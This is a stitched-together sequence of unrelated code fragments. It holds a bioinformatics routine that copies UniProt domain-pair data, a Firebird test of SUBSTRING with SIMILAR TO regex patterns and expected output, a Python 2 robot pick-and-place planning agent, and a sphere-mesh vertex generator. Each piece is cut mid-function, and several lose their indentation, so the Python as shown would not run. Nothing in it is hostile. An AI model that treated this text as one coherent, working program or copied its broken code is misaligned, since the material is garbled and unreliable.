        # (`set.add` returns None, so `not _seen.add(...)` is always True and
        # is used only for its side effect of recording the id.)
        _seen = set()
        uniprot_domain_pairs = [
            d
            for d in uniprot_domain_pairs
            if d.uniprot_domain_pair_id not in _seen and not _seen.add(d.uniprot_domain_pair_id)
        ]
        #
        archive_dir = conf.CONFIGS["archive_dir"]
        archive_type = conf.CONFIGS["archive_type"]
        # Iterate with an explicit index because items may be deleted mid-loop.
        d_idx = 0
        while d_idx < len(uniprot_domain_pairs):
            d = uniprot_domain_pairs[d_idx]
            if not d.template:
                logger.debug(
                    "Skipping uniprot domain pair with id {} because it does not "
                    "have a structural template...".format(d.uniprot_domain_pair_id)
                )
                del uniprot_domain_pairs[d_idx]
                continue
            # Copy precalculated Provean data
            if copy_data:
                # NOTE(review): `ud` stays unbound if neither uniprot_id_1 nor
                # uniprot_id_2 equals `uniprot_id`; presumably the SQL filter
                # above guarantees one matches — confirm.
                if d.uniprot_id_1 == uniprot_id:
                    ud = d.uniprot_domain_1
                elif d.uniprot_id_2 == uniprot_id:
                    ud = d.uniprot_domain_2
                try:
                    self._copy_provean(ud, archive_dir, archive_type)
                except subprocess.CalledProcessError as e:
                    logger.error(e)
                    logger.error("Failed to copy provean supporting set!")
                    # NOTE(review): should this be `ud.uniprot_sequence...`?
                    # `d` is a UniprotDomainPair; verify it actually has a
                    # `uniprot_sequence` attribute.
                    d.uniprot_sequence.provean.provean_supset_filename = ""
            # Copy precalculated homology models
            if copy_data:
                try:
                    self._copy_uniprot_domain_pair_data(
                        d, d.path_to_data, archive_dir, archive_type
                    )
                except subprocess.CalledProcessError as e:
                    logger.error(e)
                    logger.error("Failed to copy domain pair alignments and / or homology model!")
                    d.template.model.alignment_filename_1 = None
                    d.template.model.alignment_filename_2 = None
                    d.template.model.model_filename = None
            d_idx += 1
        return uniprot_domain_pairs
def _copy_uniprot_domain_data(self, d, path_to_data, archive_dir, archive_type):
if path_to_data is None:
logger.error("Cannot copy | |
<filename>tests/bugs/core_2006_test.py
#coding:utf-8
#
# id: bugs.core_2006
# title: SUBSTRING with regular expression (SIMILAR TO) capability
# description:
# tracker_id: CORE-2006
# min_versions: ['3.0']
# versions: 3.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
# Substitutions applied to isql output before comparison (none needed here).
substitutions_1 = []
# No database initialization is required for this test.
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
# isql script exercising SUBSTRING(... SIMILAR ...) with many SIMILAR TO
# patterns (CORE-2006 plus the related tickets referenced inline).
test_script_1 = """
set list on;
------------------------------------------------------------------------------
-- Test for matching with percent characters before and after pattern:
select
trim(str) str
,trim(ptn) ptn
,iif( trim(str) similar to '%'||trim(ptn)||'%', 1, 0 ) "str similar to %ptn%"
,substring( trim(str) similar '%\\"' || trim(ptn) || '\\"%' escape '\\' ) "subs(str similar to %ptn%)"
from(
select
'WDWDWDWD' str
,'((DW)|(WD)){4}' ptn
from rdb$database
union all
select
'AAXYAAXYAAAAXYAAAXYAA' str
,'(AAXY|AAAX){2,}' ptn
from rdb$database
union all
select
'YZZXYZZ0Z0YZZYZZYYZZZYZZ0Z0YZZ'
,'(0Z0(Y|Z)*){2}'
from rdb$database
union all
select
'AARARARAARARAR'
,'RA(AR){3}'
from rdb$database
union all
select
'eiavieieav' str
,'(ie){2,}' ptn
from rdb$database
union all
select
'avieieavav' str
,'(av|ie){2,}' ptn
from rdb$database
union all
select
'avieieieav' str
,'((av)|(ie)){2,}' ptn
from rdb$database
);
----------------------
-- Test for exact matching to pattern:
select
trim(str) str
,trim(ptn) ptn
,iif( trim(str) similar to trim(ptn), 1, 0 ) "str similar to ptn"
,substring( trim(str) similar '\\"' || trim(ptn) || '\\"' escape '\\' ) "subs(str similar to ptn)"
from(
select ----------- core-2389
'x/t' str
,'%[/]t' ptn
from rdb$database
union all
select ------------------- core-2756
'2015-04-13' str
,'[[:DIGIT:]]{4}[-][[:DIGIT:]]{2}[-][[:DIGIT:]]{2}' ptn
from rdb$database
union all
select ------------------- core-2780
'WI-T3.0.0.31780 Firebird 3.0 Beta 2'
,'%[0-9]+.[0-9]+.[0-9]+((.?[0-9]+)*)[[:WHITESPACE:]]%'
from rdb$database
union all
select ----------- core-3523
'm'
,'[p-k]'
from rdb$database
union all
------------------- core-3754
select '1', '(1|2){0,}' from rdb$database union all select
'1', '(1|2){0,1}' from rdb$database union all select
'1', '(1|2){1}' from rdb$database union all select
'123', '(1|12[3]?){1}' from rdb$database union all select
'123', '(1|12[3]?)+' from rdb$database union all select
------------- core-0769
'ab', 'ab|cd|efg' from rdb$database union all select
'efg', 'ab|cd|efg' from rdb$database union all select
'a', 'ab|cd|efg' from rdb$database union all select -- 0
'', 'a*' from rdb$database union all select
'a', 'a*' from rdb$database union all select
'aaa', 'a*' from rdb$database union all select
'', 'a+' from rdb$database union all select -- 0
'a', 'a+' from rdb$database union all select
'aaa', 'a+' from rdb$database union all select
'', 'a?' from rdb$database union all select
'a', 'a?' from rdb$database union all select
'aaa', 'a?' from rdb$database union all select -- 0
'', 'a{2,}' from rdb$database union all select -- 0
'a', 'a{2,}' from rdb$database union all select -- 0
'aa', 'a{2,}' from rdb$database union all select
'aaa', 'a{2,}' from rdb$database union all select
'', 'a{2,4}' from rdb$database union all select -- 0
'a', 'a{2,4}' from rdb$database union all select -- 0
'aa', 'a{2,4}' from rdb$database union all select
'aaa', 'a{2,4}' from rdb$database union all select
'aaaa', 'a{2,4}' from rdb$database union all select
'aaaaa', 'a{2,4}' from rdb$database union all select -- 0
'', '_' from rdb$database union all select -- 0
'a', '_' from rdb$database union all select
'1', '_' from rdb$database union all select
'a1', '_' from rdb$database union all select -- 0
'', '%' from rdb$database union all select
'az', 'a%z' from rdb$database union all select
'a123z', 'a%z' from rdb$database union all select
'azx', 'a%z' from rdb$database union all select -- 0
'ab', '(ab){2}' from rdb$database union all select -- 0
'aabb', '(ab){2}' from rdb$database union all select -- 0
'abab', '(ab){2}' from rdb$database union all select
'b', '[abc]' from rdb$database union all select
'd', '[abc]' from rdb$database union all select -- 0
'9', '[0-9]' from rdb$database union all select
'9', '[0-8]' from rdb$database union all select -- 0
'b', '[^abc]' from rdb$database union all select -- 0
'd', '[^abc]' from rdb$database union all select
'3', '[[:DIGIT:]^3]' from rdb$database union all select -- 0
'4', '[[:DIGIT:]^3]' from rdb$database union all select
'4', '[[:DIGIT:]]' from rdb$database union all select
'a', '[[:DIGIT:]]' from rdb$database union all select -- 0
'4', '[^[:DIGIT:]]' from rdb$database union all select -- 0
'a', '[^[:DIGIT:]]' from rdb$database
);
"""
# Action object that runs the script above against db_1 via isql.
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """
STR WDWDWDWD
PTN ((DW)|(WD)){4}
str similar to %ptn% 1
subs(str similar to %ptn%) WDWDWDWD
STR AAXYAAXYAAAAXYAAAXYAA
PTN (AAXY|AAAX){2,}
str similar to %ptn% 1
subs(str similar to %ptn%) AAXYAAXY
STR YZZXYZZ0Z0YZZYZZYYZZZYZZ0Z0YZZ
PTN (0Z0(Y|Z)*){2}
str similar to %ptn% 1
subs(str similar to %ptn%) 0Z0YZZYZZYYZZZYZZ0Z0YZZ
STR AARARARAARARAR
PTN RA(AR){3}
str similar to %ptn% 1
subs(str similar to %ptn%) RAARARAR
STR eiavieieav
PTN (ie){2,}
str similar to %ptn% 1
subs(str similar to %ptn%) ieie
STR avieieavav
PTN (av|ie){2,}
str similar to %ptn% 1
subs(str similar to %ptn%) avieieavav
STR avieieieav
PTN ((av)|(ie)){2,}
str similar to %ptn% 1
subs(str similar to %ptn%) avieieieav
STR x/t
PTN %[/]t
str similar to ptn 1
subs(str similar to ptn) x/t
STR 2015-04-13
PTN [[:DIGIT:]]{4}[-][[:DIGIT:]]{2}[-][[:DIGIT:]]{2}
str similar to ptn 1
subs(str similar to ptn) 2015-04-13
STR WI-T3.0.0.31780 Firebird 3.0 Beta 2
PTN %[0-9]+.[0-9]+.[0-9]+((.?[0-9]+)*)[[:WHITESPACE:]]%
str similar to ptn 1
subs(str similar to ptn) WI-T3.0.0.31780 Firebird 3.0 Beta 2
STR m
PTN [p-k]
str similar to ptn 0
subs(str similar to ptn) <null>
STR 1
PTN (1|2){0,}
str similar to ptn 1
subs(str similar to ptn) 1
STR 1
PTN (1|2){0,1}
str similar to ptn 1
subs(str similar to ptn) 1
STR 1
PTN (1|2){1}
str similar to ptn 1
subs(str similar to ptn) 1
STR 123
PTN (1|12[3]?){1}
str similar to ptn 1
subs(str similar to ptn) 123
STR 123
PTN (1|12[3]?)+
str similar to ptn 1
subs(str similar to ptn) 123
STR ab
PTN ab|cd|efg
str similar to ptn 1
subs(str similar to ptn) ab
STR efg
PTN ab|cd|efg
str similar to ptn 1
subs(str similar to ptn) efg
STR a
PTN ab|cd|efg
str similar to ptn 0
subs(str similar to ptn) <null>
STR
PTN a*
str similar to ptn 1
subs(str similar to ptn)
STR a
PTN a*
str similar to ptn 1
subs(str similar to ptn) a
STR aaa
PTN a*
str similar to ptn 1
subs(str similar to ptn) aaa
STR
PTN a+
str similar to ptn 0
subs(str similar to ptn) <null>
STR a
PTN a+
str similar to ptn 1
subs(str similar to ptn) a
STR aaa
PTN a+
str similar to ptn 1
subs(str similar to ptn) aaa
STR
PTN a?
str similar to ptn 1
subs(str similar to ptn)
STR a
PTN a?
str similar to ptn 1
subs(str similar to ptn) a
STR aaa
PTN a?
str similar to ptn 0
subs(str similar to ptn) <null>
STR
PTN a{2,}
str similar to ptn 0
subs(str similar to ptn) <null>
STR a
PTN a{2,}
str similar to ptn 0
subs(str similar to ptn) <null>
STR aa
PTN a{2,}
str similar to ptn 1
subs(str similar to ptn) aa
STR aaa
PTN a{2,}
str similar to ptn 1
subs(str similar to ptn) aaa
STR
PTN a{2,4}
str similar to ptn 0
subs(str similar to ptn) <null>
STR a
PTN a{2,4}
str similar to ptn 0
subs(str similar to ptn) <null>
STR aa
PTN a{2,4}
str similar to ptn 1
subs(str similar to ptn) aa
STR aaa
PTN a{2,4}
str similar to ptn 1
subs(str similar to ptn) aaa
STR aaaa
PTN a{2,4}
str similar to ptn 1
subs(str similar to ptn) aaaa
STR aaaaa
PTN a{2,4}
str similar to ptn 0
subs(str similar to ptn) <null>
STR
PTN _
str similar to ptn 0
subs(str similar to ptn) <null>
STR a
PTN _
str similar to ptn 1
subs(str similar to ptn) a
STR 1
PTN _
str similar to | |
to complain that original conf collides - bad path?
return make_move(default_conf, hpn_end_conf) # Default config is the mode of a belief state? Closer to the actual value
elif action == 'move_no_base':
start_conf, end_conf = args
hpn_start_conf = hpn_from_or_conf(default_conf, or_robot, start_conf)
hpn_end_conf = hpn_from_or_conf(default_conf, or_robot, end_conf)
return make_move_no_base(hpn_start_conf, hpn_end_conf)
elif action == 'place':
obj, pose, _, _, pap = args
grasp_conf, approach_conf = pap.grasp_config, pap.vector_config # TODO - vector config makes a big difference here?
hpn_grasp_conf = hpn_from_or_conf(default_conf, or_robot, grasp_conf)
hpn_approach_conf = hpn_from_or_conf(default_conf, or_robot, approach_conf)
face_frames = belief.objects[obj].attrs['faceFrames'] # shape.faceFrames()
rest_face = 4 # TODO - expand to other faces
mu_pose = hu.Transform(trans_from_pose(pose.value)).compose(face_frames[rest_face]).pose().xyztTuple()
#mu_pose = xyzt_from_trans(pose.value).tolist()
return make_place(self.hand, obj, rest_face, mu_pose, hpn_grasp_conf, hpn_approach_conf)
elif action == 'look':
obj, look_config = args
hpn_look_conf = hpn_from_or_conf(default_conf, or_robot, look_config)
return make_look(obj, hpn_look_conf)
else:
raise NotImplementedError(action)
def policy(self, belief, goal):
    """Plan once with the OpenRAVE/STRIPStream pipeline, then return the
    cached plan's next action on each call (converted to an HPN primitive).

    Returns [] when the goal is satisfied, None on planning failure, or a
    one-element list containing the next primitive.
    """
    # The positions of objects don't change as the robot moves (i.e they are in a global frame)
    # The variances grow though as the robot moves
    # The robot config has no uncertainty
    # Thus, things are sort of relative to the robot
    # Sample poses that are reachable given the uncertainty and can see the table
    # Can ignore transition uncertainty for action effects
    # Only need to keep track of uncertainty along hte first move action as a precondition
    # Can either sample robot trajectory rollouts or object poses as the robot moves with increased uncertainty
    # Just do large objects for base collisions
    from manipulation.primitives.transforms import vector_trans
    from manipulation.bodies.robot import approach_vector_from_object_trans
    # Debug switch: visualize HPN grasps in the HPN viewer instead of planning.
    DISPLAY_GRASPS_HPN = False
    if DISPLAY_GRASPS_HPN:
        obj = 'objA'
        conf = belief.pbs.getConf() # belief.conf # Default conf (i.e. base is wrong)
        grasp_desc = belief.objects[obj].attrs['graspDesc']
        shape = belief.objects[obj].attrs['shape']
        print shape.parts()[0].vertices()
        import util.windowManager3D as wm
        win = 'W'
        for i in range(len(grasp_desc)):
            wm.getWindow(win).clear()
            obj_trans = get_object_frame(conf, self.hand, grasp_desc[i])
            #approach_trans = get_approach_frame(conf, self.hand)
            #print np.round(approach_trans.matrix, 2)
            approach_vector = or_from_hpn_approach_vector(conf.robot, self.hand, grasp_desc[i])
            transformed_vector = approach_vector_from_object_trans(obj_trans.matrix, approach_vector)
            obj_trans = hu.Transform(vector_trans(obj_trans.matrix, transformed_vector))
            #temp_matrix = obj_trans.matrix.copy() # NOTE - this works as well?
            #temp_matrix[:3, 3] = approach_trans.matrix[:3, 3]
            #obj_trans = hu.Transform(temp_matrix)
            #print shape.origin() # Origin
            #print np.round(obj_trans.matrix, 2)
            shape.applyTrans(obj_trans).draw(win, color='blue')
            conf.draw(win, color='red')
            raw_input('Continue?')
        return None
    assert not check_belief_collisions(belief, .9)
    if satisfies(belief, goal):
        return []
    # No cached plan yet: build the OpenRAVE problem and plan from scratch.
    if self.plan is None:
        env = get_env()
        manip_problem = or_manipulation_problem(env, belief, goal)
        #manip_problem.set_viewer(env)
        self.oracle = ManipulationOracle(manip_problem, env, active_arms=[self.hand], reset_robot=False) # TODO - need to avoid resetting the original configuration
        # TODO - try just replacing the current problem
        # Debug switch: visualize OpenRAVE grasps instead of planning.
        DISPLAY_GRASPS_OR = False
        if DISPLAY_GRASPS_OR: # NOTE - OR Grasps are from Manip to Pose (not Gripper)
            from manipulation.bodies.robot import get_manip_trans, approach_vector_from_object_trans
            from manipulation.primitives.transforms import object_trans_from_manip_trans, set_trans, point_from_trans
            from manipulation.grasps.grasps import get_grasps
            from manipulation.primitives.display import draw_arrow
            obj = 'objA'
            #set_trans(self.oracle.bodies[obj], np.eye(4))
            #print self.oracle.bodies[obj].ComputeAABB()
            #for grasp in get_grasps(self.oracle, obj): # NOTE - this randomizes the grasps
            for grasp in get_or_grasps(self.oracle, obj):
                manip_trans = get_manip_trans(self.oracle)
                #grasp_trans = or_from_hpn_grasp(belief.conf.robot, self.hand, grasp_desc[i]).matrix
                obj_trans = object_trans_from_manip_trans(manip_trans, grasp.grasp_trans)
                set_trans(self.oracle.bodies[obj], obj_trans)
                approach_vector = approach_vector_from_object_trans(obj_trans, grasp.approach_vector)
                approach_trans = vector_trans(obj_trans, approach_vector)
                _ = draw_arrow(env, point_from_trans(approach_trans), point_from_trans(obj_trans))
                print
                print grasp.approach_vector
                print grasp.grasp_index
                print np.round(obj_trans, 2)
                raw_input('Continue?')
            return None
        # TODO - check that the plan is still good by converting the state
        stream_problem = compile_problem(self.oracle)
        self.oracle.draw_goals() # NOTE - this must be after compile_problem to ensure the goal_poses convert
        if is_viewer_active(self.oracle.env):
            raw_input('Start?')
        search_fn = get_fast_downward('eager', verbose=False) # dijkstra | astar | wastar1 | wastar2 | wastar3 | eager | lazy
        plan, universe = focused_planner(stream_problem, search=search_fn, greedy=False, stream_cost=10, verbose=False, debug=False)
        #plan, universe = incremental_planner(stream_problem, search=search_fn, verbose=True, debug=False)
        if plan is None:
            plan = []
        #visualize_plan(Plan(convert_state(self.oracle, stream_problem.initial_atoms),
        # executable_plan(self.oracle, plan)), self.oracle, display=True, save=None)
        #for state in get_states(universe, plan):
        # or_state = convert_state(self.oracle, state)
        # set_state(or_state, self.oracle)
        # raw_input('Continue?')
        # Post-process the symbolic plan: interleave look actions and expand
        # pick/place into approach/grasp move segments.
        look_iterations = 3
        self.plan = []
        state_sequence = get_states(universe, plan)
        for i, (action, args) in enumerate(convert_plan(plan)):
            or_state = convert_state(self.oracle, state_sequence[i])
            set_state(or_state, self.oracle)
            if action.name in ['move']:
                last_config = self.oracle.get_robot_config()
                for _ in range(look_iterations):
                    for obj in belief.objects:
                        if or_state.get(obj, True) is not None:
                            result = look_at_ik(self.oracle, obj)
                            if result is not None:
                                look_config = self.oracle.get_robot_config()
                                self.plan += [
                                    ('move_no_base', (last_config, look_config)),
                                    ('look', (obj, look_config)),
                                ]
                                last_config = look_config # TODO - does this mean I have to change the next action config?
                                #print 'Looking at', obj
                                #raw_input('Pause')
                self.plan.append((action.name, args))
            elif action.name in ['pick', 'place']:
                obj, pose, grasp, approach_config, pap = args
                self.plan += [
                    ('move_no_base', (approach_config, pap.vector_config)),
                    ('move_no_base', (pap.vector_config, pap.grasp_config)),
                    (action.name, args),
                    ('move_no_base', (pap.grasp_config, pap.vector_config)),
                    ('move_no_base', (pap.vector_config, approach_config)),
                ]
                # In replan mode, keep only the plan prefix up to the first
                # pick/place and replan afterwards.
                if self.replan:
                    break
            else:
                self.plan.append((action.name, args))
            #raw_input('Continue?')
        print self.plan
    if not self.plan:
        return None
    print SEPARATOR
    # Pop and convert the next cached action.
    action, args = self.plan.pop(0)
    print action, args
    if not self.plan and self.replan:
        self.plan = None
    return [self.convert_action(belief, action, args)] # NOTE - need to return a list for now
#################################################################
class TestAgent(object):
    """Debugging agent: prints belief-state internals, then returns a fixed
    two-step plan (move base + pick) for manual inspection."""

    def __init__(self, exp, goal): # TODO - allow something else to be here?
        self.exp = exp
        self.goal = goal
        self.iterations = 0
        self.plan = None

    def policy(self, belief, goal):
        # Stop as soon as the goal is satisfied in the current belief.
        if satisfies(belief, goal):
            return []
        #if self.iterations != 0:
        # return []
        self.iterations += 1
        # Once a plan exists, replay it one step at a time.
        if self.plan is not None:
            if len(self.plan) == 0:
                return []
            return [self.plan.pop(0)]
        print
        print belief.pbs.__class__ # PBS (Planning Belief State?)
        print belief.pbs.getWorld().__class__ # World
        # TODO - realWorld is RealWorld or RobotEnv within PlanTest. Has executePrim within it
        print 'Regions', self.exp.regions
        USE_HAND = 'right'
        print belief.makeObjGraspB(USE_HAND) # Gets the current grasp?
        # Extract the most-likely state (configuration, held objects, poses).
        conf, (leftHeld, leftObjGraspType, leftObjGrasp), \
            (rightHeld, rightObjGraspType, rightObjGrasp), objects = makeMLS(belief) # Extract MLS from b
        objects_dict = {props[0]: props[1:] for props in objects}
        robot = conf.robot
        #print conf.cartConf()
        print
        name = 'objA'
        type_name, support_face, pose = objects_dict[name]
        wrapped_pose = hu.Pose(*pose)
        identity_pose = hu.Pose(0, 0, 0, 0)
        print wrapped_pose.matrix
        print type_name, support_face, pose
        geom, _ = glob.constructor[type_name](name=name)
        grasp_desc = belief.objects[name].attrs['graspDesc']
        grasp_index = 0
        grasp = grasp_desc[grasp_index]
        # G * M = P
        print grasp.frame # Transform
        print grasp.dx, grasp.dy, grasp.dz # Don't know what these do...
        grasp_trans = grasp.frame.inverse().compose(wrapped_pose)
        print robot.potentialBasePosesGen
        print robot.inverseKinWristGen # Allows choosing base pose
        print graspConfHypGen
        #grasp_cart = RobotCartConf(grasp_trans, robot) # First argument must be a conf?
        grasp_cart = conf.getCart()
        grasp_cart = grasp_cart.set('pr2RightArm', grasp_trans)
        print
        print 'Kinematics'
        print conf.getCart()
        #print conf
        #print robot.inverseKin(get_manip(conf), conf)
        print robot.inverseKin(grasp_cart, conf)
        print
        # TODO - need to sample the base?
        # Return plan with one move operation
        currConf = copy.copy(conf)
        goalConf = currConf.setBaseConf((0.2, 0.2, 0.2))
        self.plan = [
            make_move(currConf, goalConf),
            make_pick(USE_HAND, name, grasp_desc, grasp_index, pose, tinyVar, currConf, currConf),
        ]
        print
        print conf
        print leftHeld, leftObjGraspType, leftObjGrasp
        print rightHeld, rightObjGraspType, rightObjGrasp
        print objects
        #print goal.satisfies(belief) # Nope
        #print belief.satisfies(goal) # Nope
        print goal
        print self.plan
        raw_input('Found plan! Continue?')
        print
        # NOTE(review): the `return None` below makes the final return
        # statement unreachable; presumably left in while debugging.
        return None
        #return None # Fail
        #return [] # Sucess
        return self.plan[:1] # NOTE - only the first step really matters
#################################################################
def test0():
    """Single-table experiment: move objA onto the left region of the table."""
    variance = tinyVar # bigVar | tinyVar
    table_poses = {'tableIkea1': (hu.Pose(1.3, 0.0, 0.0, math.pi / 2.0), variance)}
    object_poses = {'objA': (hu.Pose(1.1, 0.0, ikZ, 0.0), variance)}
    regions = ['tableIkea1Top', 'tableIkea1Left']
    # easy replaces the variance
    exp = Experiment(table_poses, object_poses, regions, easy=False)
    goal = inRegion(['objA'], 'tableIkea1Left')
    return exp, goal
def testBusy(hardSwap=True, **kwargs):
    """Cluttered-table experiment: seven objects on table1 with swap-style goals."""
    glob.rebindPenalty = 40
    # Put this back to make the problem harder
    #back = hu.Pose(1.1, 0.0, tZ, 0.0)
    back = hu.Pose(1.45, 0.0, tZ, 0.0)
    #parking1 = hu.Pose(1.15, 0.3, tZ, 0.0)
    #parking2 = hu.Pose(1.15, -0.3, tZ, 0.0)
    table_poses = {
        'table1': (table1Pose, smallVar),
        'table2': (table2Pose, smallVar),
    }
    object_poses = {
        'objA': (back, medVar),
        'objB': (hu.Pose(1.15, -0.4, tZ, 0.0), medVar),
        'objC': (hu.Pose(0.65, -1.2, tZ, 0.0), medVar),
        'objD': (hu.Pose(1.15, -0.2, tZ, 0.0), medVar),
        'objE': (hu.Pose(1.15, 0.0, tZ, 0.0), medVar),
        'objF': (hu.Pose(1.15, 0.2, tZ, 0.0), medVar),
        'objG': (hu.Pose(1.15, 0.4, tZ, 0.0), medVar),
    }
    regions = ['table1Top', 'table2Top', 'table1MidFront', 'table1MidRear']
    exp = Experiment(table_poses, object_poses, regions, easy=kwargs.get('easy', False))
    goal = inRegion(['objA', 'objB'], ['table1MidFront', 'table1MidRear']) # A on other table
    goal1 = inRegion('objA', 'table2Top') # A and B on other table (unused variant)
    goal2 = inRegion(['objA', 'objB'], 'table2Top') # B in back (unused variant)
    goal3 = inRegion('objB', 'table1MidRear')
    actualGoal = goal if hardSwap else goal3
    return exp, actualGoal
#################################################################
def solve_belief(env, hand='right', grasp_type=0, no_window=True):
exp, goal = test0()
print SEPARATOR
#print glob.graspableNames # ['obj', 'soda', 'ts', 'handle', 'soup', 'oilBottle', 'rfunnel', 'bfunnel', 'sb']
#print glob.pushableNames | |
+ .5 * c / segs_tc
v = .5 + .5 * s * (-1. if inverted else 1.) / segs_tc
if tex_size:
u = (u - .5) * 2. * radius_h / tex_size[0] + .5
v = (v - .5) * 2. * radius_h / tex_size[1] + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": (x, y, z),
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
# Define the vertex order of the top cap triangles
for i in range(index_offset + 1, index_offset + segs_h + 1):
indices.extend((index_offset, i, i + 1))
# Define the top cap quad vertices
for i in range(1, segs_tc):
r = radius_h * (i + 1) / segs_tc
for j in range(segs_h + 1):
angle_h = delta_angle_h * j + (0. if inverted else slice_radians)
c = cos(angle_h)
s = sin(angle_h) * (-1. if inverted else 1.)
x = r * c
y = r * s
if has_uvs:
r_ = (i + 1) / segs_tc
u = .5 + .5 * c * r_
v = .5 + .5 * s * (-1. if inverted else 1.) * r_
if tex_size:
u = (u - .5) * 2. * radius_h / tex_size[0] + .5
v = (v - .5) * 2. * radius_h / tex_size[1] + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": (x, y, z),
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
# Define the vertex order of the top cap quads
index_offset += segs_h + 2
for i in range(1, segs_tc):
for j in range(segs_h):
vi1 = index_offset + j
vi2 = vi1 - segs_h - 1
vi3 = vi2 + 1
vi4 = vi1 + 1
indices.extend((vi1, vi3, vi2) if inverted else (vi1, vi4, vi2))
indices.extend((vi1, vi4, vi3) if inverted else (vi4, vi3, vi2))
index_offset += segs_h + 1
end = len(values) // stride
vert_ranges["top_cap"] = (top_cap_start_index, len(verts))
if segs_sc and slice and bottom_height < radius and top_height > -radius \
and thickness:
# Define the slice cap vertices
for cap_id in ("start", "end"):
index_offset = slice_cap_start_index = len(verts)
if cap_id == "start":
normal = (0., -1. if inverted else 1., 0.)
else:
angle_h = delta_angle_h * segs_h
c_h = cos(angle_h)
s_h = -sin(angle_h)
normal = Vec3(s_h, -c_h, 0.) * (-1. if inverted else 1.)
seg_vecs = []
if inner_radius:
inner_pos = []
if bottom_clip > -1.:
inner_pos.append(Point3(0., 0., inner_bottom_height))
seg_vecs.append(Vec3(0., 0., -thickness / segs_sc))
for i in range(segs_v + 1):
angle_v = bottom_angle + delta_angle_v * i
c = -cos(angle_v)
r = radius * sin(angle_v)
z = radius * c
i_angle_v = inner_bottom_angle + inner_delta_angle_v * i
i_c = -cos(i_angle_v)
i_r = inner_radius * sin(i_angle_v)
i_z = inner_radius * i_c
if cap_id == "start":
p = Point3(r, 0., z)
i_p = Point3(i_r, 0., i_z)
else:
p = Point3(r * c_h, r * s_h, z)
i_p = Point3(i_r * c_h, i_r * s_h, i_z)
inner_pos.append(i_p)
seg_vecs.append((p - i_p) / segs_sc)
if top_clip < 1.:
inner_pos.append(Point3(0., 0., inner_top_height))
seg_vecs.append(Vec3(0., 0., thickness / segs_sc))
else:
z = (top_height + bottom_height) * .5
h = (top_height - bottom_height) * .5
inner_pos = Point3(0., 0., z)
if bottom_clip > -1.:
seg_vecs.append(Vec3(0., 0., -h / segs_sc))
for i in range(segs_v + 1):
angle_v = bottom_angle + delta_angle_v * i
c = -cos(angle_v)
r = radius * sin(angle_v)
z = radius * c
if cap_id == "start":
p = Point3(r, 0., z)
else:
p = Point3(r * c_h, r * s_h, z)
seg_vecs.append((p - inner_pos) / segs_sc)
if top_clip < 1.:
seg_vecs.append(Vec3(0., 0., h / segs_sc))
if has_uvs:
cap_name = "slice_{}_cap".format(cap_id)
if tex_units and cap_name in tex_units:
tex_size = tex_units[cap_name]
u_f = 2 * radius / tex_size[0]
v_f = 2 * radius / tex_size[1]
else:
tex_size = None
mat = self._get_tex_xform(cap_name)
if inner_radius:
# Define the lower inner central vertex of the slice cap
if bottom_clip > -1.:
pos = inner_pos[0]
if has_uvs:
u = .5
v = .5 + .5 * pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
index_offset += 1
# Define the main inner vertices of the slice cap quads
for i in range(segs_v + 1):
pos = inner_pos[i + (1 if bottom_clip > -1. else 0)]
vec = Vec3(pos)
if has_uvs:
if cap_id == "start":
u = .5 + .5 * pos.x / radius * (1. if inverted else -1.)
else:
vec[2] = 0.
u = .5 - .5 * vec.length() / radius * (1. if inverted else -1.)
v = .5 + .5 * pos.z / radius
if tex_size:
u = (u - .5) * u_f + .5
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
index_offset += segs_v + 1
# Define the upper inner central vertex of the slice cap
if top_clip < 1.:
pos = inner_pos[-1]
if has_uvs:
u = .5
v = .5 + .5 * pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
index_offset += 1
else:
# Define the center vertex of the slice cap
if has_uvs:
u = .5
v = .5 + .5 * inner_pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": inner_pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
for i in range(segs_sc):
# Define the lower central vertices of the slice cap
if bottom_clip > -1.:
i_p = inner_pos[0] if inner_radius else inner_pos
pos = i_p + seg_vecs[0] * (i + 1)
if has_uvs:
u = .5
v = .5 + .5 * pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
# Define the main vertices of the slice cap polygons
for j in range(segs_v + 1):
index = j + (1 if bottom_clip > -1. else 0)
i_p = inner_pos[index] if inner_radius else inner_pos
pos = i_p + seg_vecs[index] * (i + 1)
vec = Vec3(pos)
if has_uvs:
if cap_id == "start":
u = .5 + .5 * pos.x / radius * (1. if inverted else -1.)
else:
vec[2] = 0.
u = .5 - .5 * vec.length() / radius * (1. if inverted else -1.)
v = .5 + .5 * pos.z / radius
if tex_size:
u = (u - .5) * u_f + .5
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
# Define the upper central vertices of the slice cap
if top_clip < 1.:
i_p = inner_pos[-1] if inner_radius else inner_pos
pos = i_p + seg_vecs[-1] * (i + 1)
if has_uvs:
u = .5
v = .5 + .5 * pos.z / radius
if tex_size:
v = (v - .5) * v_f + .5
if mat:
u, v = mat.xform_point(Point2(u, v))
else:
u = v = 0.
vert = {
"pos": pos,
"normal": normal,
"uv": (u, v)
}
verts.append(vert)
if i == 0 and not inner_radius:
